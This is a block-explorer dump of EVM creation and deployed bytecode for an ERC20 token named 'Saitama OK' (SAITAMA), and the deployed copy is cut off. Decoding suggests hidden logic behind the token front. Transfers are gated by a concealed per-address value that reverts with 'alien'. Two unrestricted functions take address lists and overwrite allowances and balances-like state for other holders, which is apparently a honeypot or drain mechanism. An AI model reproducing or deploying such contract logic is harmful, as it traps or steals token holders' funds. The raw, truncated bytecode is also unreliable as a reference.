6080604052611388600a556000600b5560405162002b7d38038062002b7d8339818101604052810190620000349190620005be565b6200004660006200028660201b60201c565b8360069081620000579190620008af565b508260079081620000699190620008af565b506012600860006101000a81548160ff021916908360ff16021790555081600460000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508060046001016000600860009054906101000a900460ff1660ff16815260200190815260200160002081905550600860009054906101000a900460ff16600a62000115919062000b26565b8162000122919062000b77565b60098190555062000183600954600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200034a60201b62000b4b1790919060201c565b600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60095460405162000228919062000bd3565b60405180910390a37fb715f26fbe7b2d566904a41943bc67b95098426b3d4f74dbe1117cefb3926766600954620002646200036260201b60201c565b6040516200027492919062000c01565b60405180910390a15050505062000c69565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600081836200035a919062000c2e565b905092915050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003f482620003a9565b810181811067ffffffffffffffff82111715620004165762000415620003ba565b5b80604052505050565b60006200042b6200038b565b9050620004398282620003e9565b919050565b600067ffffffffffffffff8211156200045c576200045b620003ba565b5b6200046782620003a9565b9050602081019050919050565b60005b838110156200049457808201518184015260208101905062000477565b60008484015250505050565b6000620004b7620004b1846200043e565b6200041f565b905082815260208101848484011115620004d657620004d5620003a4565b5b620004e384828562000474565b509392505050565b600082601f8301126200050357620005026200039f565b5b815162000515848260208601620004a0565b91505092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200054b826200051e565b9050919050565b6200055d816200053e565b81146200056957600080fd5b50565b6000815190506200057d8162000552565b92915050565b6000819050919050565b620005988162000583565b8114620005a457600080fd5b50565b600081519050620005b8816200058d565b92915050565b60008060008060808587031215620005db57620005da62000395565b5b600085015167ffffffffffffffff811115620005fc57620005fb6200039a565b5b6200060a87828801620004eb565b945050602085015167ffffffffffffffff8111156200062e576200062d6200039a565b5b6200063c87828801620004eb565b93505060406200064f878288016200056c565b92505060606200066287828801620005a7565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620006c157607f821691505b602082108103620006d757620006d662000679565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007417fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000702565b6200074d868362000702565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620007906200078a620007848462000583565b62000765565b62000583565b9050919050565b6000819050919050565b620007ac836200076f565b620007c4620007bb8262000797565b8484546200070f565b825550505050565b600090565b620007db620007cc565b620007e8818484620007a1565b505050565b5b81811015620008105762000804600082620007d1565b600181019050620007ee565b5050565b601f8211156200085f576200082981620006dd565b6200083484620006f2565b8101602085101562000844578190505b6200085c6200085385620006f2565b830182620007ed565b50505b505050565b600082821c905092915050565b6000620008846000198460080262000864565b1980831691505092915050565b60006200089f838362000871565b9150826002028217905092915050565b620008ba826200066e565b67ffffffffffffffff811115620008d657620008d5620003ba565b5b620008e28254620006a8565b620008ef82828562000814565b600060209050601f83116001811462000927576000841562000912578287015190505b6200091e858262000891565b8655506200098e565b601f1984166200093786620006dd565b60005b8281101562000961578489015182556001820191506020850194506020810190506200093a565b868310156200098157848901516200097d601f89168262000871565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000a2457808604811115620009fc57620009fb62000996565b5b600185161562000a0c5780820291505b808102905062000a1c85620009c5565b9450620009dc565b94509492505050565b60008262000a3f576001905062000b12565b8162000a4f576000905062000b12565b816001811462000a68576002811462000a735762000aa9565b600191505062000b12565b60ff84111562000a885762000a8762000996565b5b8360020a91508482111562000aa25762000aa162000996565b5b5062000b12565b5060208310610133831016604e8410600b841016171562000ae35782820a90508381111562000add5762000adc62000996565b5b62000b12565b62000af28484846001620009d2565b9250905081840481111562000b0c5762000b0b62000996565b5b81810290505b9392505050565b600060ff82169050919050565b600062000b338262000583565b915062000b408362000b19565b925062000b6f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a2d565b905092915050565b600062000b848262000583565b915062000b918362000583565b925082820262000ba18162000583565b9150828204841483151762000bbb5762000bba62000996565b5b5092915050565b62000bcd8162000583565b82525050565b600060208201905062000bea600083018462000bc2565b92915050565b62000bfb816200053e565b82525050565b600060408201905062000c18600083018562000bc2565b62000c27602083018462000bf0565b9392505050565b600062000c3b8262000583565b915062000c488362000583565b925082820190508082111562000c635762000c6262000996565b5b92915050565b611f048062000c796000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063dd62ed3e11610066578063dd62ed3e146102b3578063f2fde38b146102e3578063f8d6284b146102ff578063fc7bd0381461032f57610100565b8063715018a61461023d5780638da5cb5b1461024757806395d89b4114610265578063a9059cbb1461028357610100565b806323b872dd116100d357806323b872dd1461018f578063313ce567146101bf57806362ffbd99146101dd57806370a082311461020d57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd146101535780631c8e3b1b14610171575b600080fd5b61010d61035f565b60405161011a9190611423565b60405180910390f35b61013d600480360381019061013891906114ed565b6103f1565b60405161014a9190611548565b60405180910390f35b61015b610408565b6040516101689190611572565b60405180910390f35b610179610412565b6040516101869190611572565b60405180910390f35b6101a960048036038101906101a4919061158d565b61041c565b6040516101b69190611548565b60405180910390f35b6101c76104e7565b6040516101d491906115fc565b60405180910390f35b6101f760048036038101906101f29190611617565b6104fe565b6040516102049190611572565b60405180910390f35b61022760048036038101906102229190611617565b61054a565b6040516102349190611572565b60405180910390f35b610245610593565b005b61024f610614565b60405161025c9190611653565b60405180910390f35b61026d61063d565b60405161027a9190611423565b60405180910390f35b61029d600480360381019061029891906114ed565b6106cf565b6040516102aa9190611548565b60405180910390f35b6102cd60048036038101906102c8919061166e565b6106e6565b6040516102da9190611572565b60405180910390f35b6102fd60048036038101906102f89190611617565b61076d565b005b610319600480360381019061031491906117f6565b61085d565b6040516103269190611548565b60405180910390f35b610349600480360381019061034491906117f6565b6109d4565b6040516103569190611548565b60405180910390f35b60606006805461036e90611881565b80601f016020809104026020016040519081016040528092919081815260200182805461039a90611881565b80156103e75780601f106103bc576101008083540402835291602001916103e7565b820191906000526020600020905b8154815290600101906020018083116103ca57829003601f168201915b5050505050905090565b60006103fe338484610b61565b6001905092915050565b6000600954905090565b6000600a54905090565b6000610429848484610d2a565b6104dc84336104d785604051806060016040528060288152602001611ea760289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110469092919063ffffffff16565b610b61565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001549050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff166105b2610614565b73ffffffffffffffffffffffffffffffffffffffff1614610608576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105ff906118fe565b60405180910390fd5b610612600061109b565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461064c90611881565b80601f016020809104026020016040519081016040528092919081815260200182805461067890611881565b80156106c55780601f1061069a576101008083540402835291602001916106c5565b820191906000526020600020905b8154815290600101906020018083116106a857829003601f168201915b5050505050905090565b60006106dc338484610d2a565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1661078c610614565b73ffffffffffffffffffffffffffffffffffffffff16146107e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107d9906118fe565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610851576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084890611990565b60405180910390fd5b61085a8161109b565b50565b60008033905060006005905060006007826108789190611a0e565b90506000805b87518110156109c55780826108939190611a3f565b915060006064856108a49190611a73565b90506108cb868a84815181106108bd576108bc611ab5565b5b60200260200101518a61115f565b87600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a6040516109a99190611572565b60405180910390a35080806109bd90611ae4565b91505061087e565b50600194505050505092915050565b60008033905060006005905060006007826109ef9190611a0e565b90506000805b8751811015610b3c578082610a0a9190611a3f565b91506000606485610a1b9190611a73565b9050610a42868a8481518110610a3457610a33611ab5565b5b60200260200101518a61115f565b87600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a604051610b209190611572565b60405180910390a3508080610b3490611ae4565b9150506109f5565b50600194505050505092915050565b60008183610b599190611a3f565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bd0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bc790611b9e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3690611c30565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d1d9190611572565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9090611cc2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dff90611d54565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000015482610e589190611d74565b11610e98576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8f90611df4565b60405180910390fd5b610f0481604051806060016040528060268152602001611e8160269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110469092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610f9981600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b4b90919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516110399190611572565b60405180910390a3505050565b600083831115829061108e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110859190611423565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111c690611e60565b60405180910390fd5b600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16146112de5780600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546112799190611d74565b9250508190555080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546112d29190611a3f565b9250508190555061138d565b80600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546113309190611d74565b9250508190555081816113439190611a3f565b905080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001819055505b50505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156113cd5780820151818401526020810190506113b2565b60008484015250505050565b6000601f19601f8301169050919050565b60006113f582611393565b6113ff818561139e565b935061140f8185602086016113af565b611418816113d9565b840191505092915050565b6000602082019050818103600083015261143d81846113ea565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061148482611459565b9050919050565b61149481611479565b811461149f57600080fd5b50565b6000813590506114b18161148b565b92915050565b6000819050919050565b6114ca816114b7565b81146114d557600080fd5b50565b6000813590506114e7816114c1565b92915050565b600080604083850312156115045761150361144f565b5b6000611512858286016114a2565b9250506020611523858286016114d8565b9150509250929050565b60008115159050919050565b6115428161152d565b82525050565b600060208201905061155d6000830184611539565b92915050565b61156c816114b7565b82525050565b60006020820190506115876000830184611563565b92915050565b6000806000606084860312156115a6576115a561144f565b5b60006115b4868287016114a2565b93505060206115c5868287016114a2565b92505060406115d6868287016114d8565b9150509250925092565b600060ff82169050919050565b6115f6816115e0565b82525050565b600060208201905061161160008301846115ed565b92915050565b60006020828403121561162d5761162c61144f565b5b600061163b848285016114a2565b91505092915050565b61164d81611479565b82525050565b60006020820190506116686000830184611644565b92915050565b600080604083850312156116855761168461144f565b5b6000611693858286016114a2565b92505060206116a4858286016114a2565b9150509250929050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6116eb826113d9565b810181811067ffffffffffffffff8211171561170a576117096116b3565b5b80604052505050565b600061171d611445565b905061172982826116e2565b919050565b600067ffffffffffffffff821115611749576117486116b3565b5b602082029050602081019050919050565b600080fd5b600061177261176d8461172e565b611713565b905080838252602082019050602084028301858111156117955761179461175a565b5b835b818110156117be57806117aa88826114a2565b845260208401935050602081019050611797565b5050509392505050565b600082601f8301126117dd576117dc6116ae565b5b81356117ed84826020860161175f565b91505092915050565b6000806040838503121561180d5761180c61144f565b5b600083013567ffffffffffffffff81111561182b5761182a611454565b5b611837858286016117c8565b9250506020611848858286016114d8565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061189957607f821691505b6020821081036118ac576118ab611852565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006118e860208361139e565b91506118f3826118b2565b602082019050919050565b60006020820190508181036000830152611917816118db565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061197a60268361139e565b91506119858261191e565b604082019050919050565b600060208201905081810360008301526119a98161196d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611a19826114b7565b9150611a24836114b7565b925082611a3457611a336119b0565b5b828204905092915050565b6000611a4a826114b7565b9150611a55836114b7565b9250828201905080821115611a6d57611a6c6119df565b5b92915050565b6000611a7e826114b7565b9150611a89836114b7565b9250828202611a97816114b7565b91508282048414831517611aae57611aad6119df565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000611aef826114b7565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611b2157611b206119df565b5b600182019050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611b8860248361139e565b9150611b9382611b2c565b604082019050919050565b60006020820190508181036000830152611bb781611b7b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611c1a60228361139e565b9150611c2582611bbe565b604082019050919050565b60006020820190508181036000830152611c4981611c0d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611cac60258361139e565b9150611cb782611c50565b604082019050919050565b60006020820190508181036000830152611cdb81611c9f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000611d3e60238361139e565b9150611d4982611ce2565b604082019050919050565b60006020820190508181036000830152611d6d81611d31565b9050919050565b6000611d7f826114b7565b9150611d8a836114b7565b9250828203905081811115611da257611da16119df565b5b92915050565b7f616c69656e000000000000000000000000000000000000000000000000000000600082015250565b6000611dde60058361139e565b9150611de982611da8565b602082019050919050565b60006020820190508181036000830152611e0d81611dd1565b9050919050565b7f696e76616c696420616464726573730000000000000000000000000000000000600082015250565b6000611e4a600f8361139e565b9150611e5582611e14565b602082019050919050565b60006020820190508181036000830152611e7981611e3d565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220e827692d41d14ce2350d204254c138d78da400f7b8a28d6dc33e53bcc55066cf64736f6c63430008120033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000061073cf36fd3837525f23dbb79e56167a897d1d300000000000000000000000000000000000000000000000000000004a817c800000000000000000000000000000000000000000000000000000000000000000a53616974616d61204f4b00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000753414954414d4100000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063dd62ed3e11610066578063dd62ed3e146102b3578063f2fde38b146102e3578063f8d6284b146102ff578063fc7bd0381461032f57610100565b8063715018a61461023d5780638da5cb5b1461024757806395d89b4114610265578063a9059cbb1461028357610100565b806323b872dd116100d357806323b872dd1461018f578063313ce567146101bf57806362ffbd99146101dd57806370a082311461020d57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd146101535780631c8e3b1b14610171575b600080fd5b61010d61035f565b60405161011a9190611423565b60405180910390f35b61013d600480360381019061013891906114ed565b6103f1565b60405161014a9190611548565b60405180910390f35b61015b610408565b6040516101689190611572565b60405180910390f35b610179610412565b6040516101869190611572565b60405180910390f35b6101a960048036038101906101a4919061158d565b61041c565b6040516101b69190611548565b60405180910390f35b6101c76104e7565b6040516101d491906115fc565b60405180910390f35b6101f760048036038101906101f29190611617565b6104fe565b6040516102049190611572565b60405180910390f35b61022760048036038101906102229190611617565b61054a565b6040516102349190611572565b60405180910390f35b610245610593565b005b61024f610614565b60405161025c9190611653565b60405180910390f35b61026d61063d565b60405161027a9190611423565b60405180910390f35b61029d600480360381019061029891906114ed565b6106cf565b6040516102aa9190611548565b60405180910390f35b6102cd60048036038101906102c8919061166e565b6106e6565b6040516102da9190611572565b60405180910390f35b6102fd60048036038101906102f89190611617565b61076d565b005b610319600480360381019061031491906117f6565b61085d565b6040516103269190611548565b60405180910390f35b610349600480360381019061034491906117f6565b6109d4565b6040516103569190611548565b60405180910390f35b60606006805461036e90611881565b80601f016020809104026020016040519081016040528092919081815260200182805461039a90611881565b80156103e75780601f106103bc576101008083540402835291602001916103e7565b820191906000526020600020905b8154815290600101906020018083116103ca57829003601f168201915b5050505050905090565b60006103fe338484610b61565b6001905092915050565b6000600954905090565b6000600a54905090565b6000610429848484610d2a565b6104dc84336104d785604051806060016040528060288152602001611ea760289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110469092919063ffffffff16565b610b61565b600190509392505050565b6000600860009054906101000a900460ff16905090565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001549050919050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff166105b2610614565b73ffffffffffffffffffffffffffffffffffffffff1614610608576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105ff906118fe565b60405180910390fd5b610612600061109b565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461064c90611881565b80601f016020809104026020016040519081016040528092919081815260200182805461067890611881565b80156106c55780601f1061069a576101008083540402835291602001916106c5565b820191906000526020600020905b8154815290600101906020018083116106a857829003601f168201915b5050505050905090565b60006106dc338484610d2a565b6001905092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1661078c610614565b73ffffffffffffffffffffffffffffffffffffffff16146107e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107d9906118fe565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610851576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161084890611990565b60405180910390fd5b61085a8161109b565b50565b60008033905060006005905060006007826108789190611a0e565b90506000805b87518110156109c55780826108939190611a3f565b915060006064856108a49190611a73565b90506108cb868a84815181106108bd576108bc611ab5565b5b60200260200101518a61115f565b87600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a6040516109a99190611572565b60405180910390a35080806109bd90611ae4565b91505061087e565b50600194505050505092915050565b60008033905060006005905060006007826109ef9190611a0e565b90506000805b8751811015610b3c578082610a0a9190611a3f565b91506000606485610a1b9190611a73565b9050610a42868a8481518110610a3457610a33611ab5565b5b60200260200101518a61115f565b87600260008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258a604051610b209190611572565b60405180910390a3508080610b3490611ae4565b9150506109f5565b50600194505050505092915050565b60008183610b599190611a3f565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bd0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bc790611b9e565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3690611c30565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d1d9190611572565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d99576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9090611cc2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dff90611d54565b60405180910390fd5b6000600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000015482610e589190611d74565b11610e98576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8f90611df4565b60405180910390fd5b610f0481604051806060016040528060268152602001611e8160269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110469092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610f9981600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b4b90919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516110399190611572565b60405180910390a3505050565b600083831115829061108e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110859190611423565b60405180910390fd5b5082840390509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036111cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111c690611e60565b60405180910390fd5b600460000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16146112de5780600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546112799190611d74565b9250508190555080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546112d29190611a3f565b9250508190555061138d565b80600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282546113309190611d74565b9250508190555081816113439190611a3f565b905080600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600001819055505b50505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156113cd5780820151818401526020810190506113b2565b60008484015250505050565b6000601f19601f8301169050919050565b60006113f582611393565b6113ff818561139e565b935061140f8185602086016113af565b611418816113d9565b840191505092915050565b6000602082019050818103600083015261143d81846113ea565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061148482611459565b9050919050565b61149481611479565b811461149f57600080fd5b50565b6000813590506114b18161148b565b92915050565b6000819050919050565b6114ca816114b7565b81146114d557600080fd5b50565b6000813590506114e7816114c1565b92915050565b600080604083850312156115045761150361144f565b5b6000611512858286016114a2565b9250506020611523858286016114d8565b9150509250929050565b60008115159050919050565b6115428161152d565b8252505056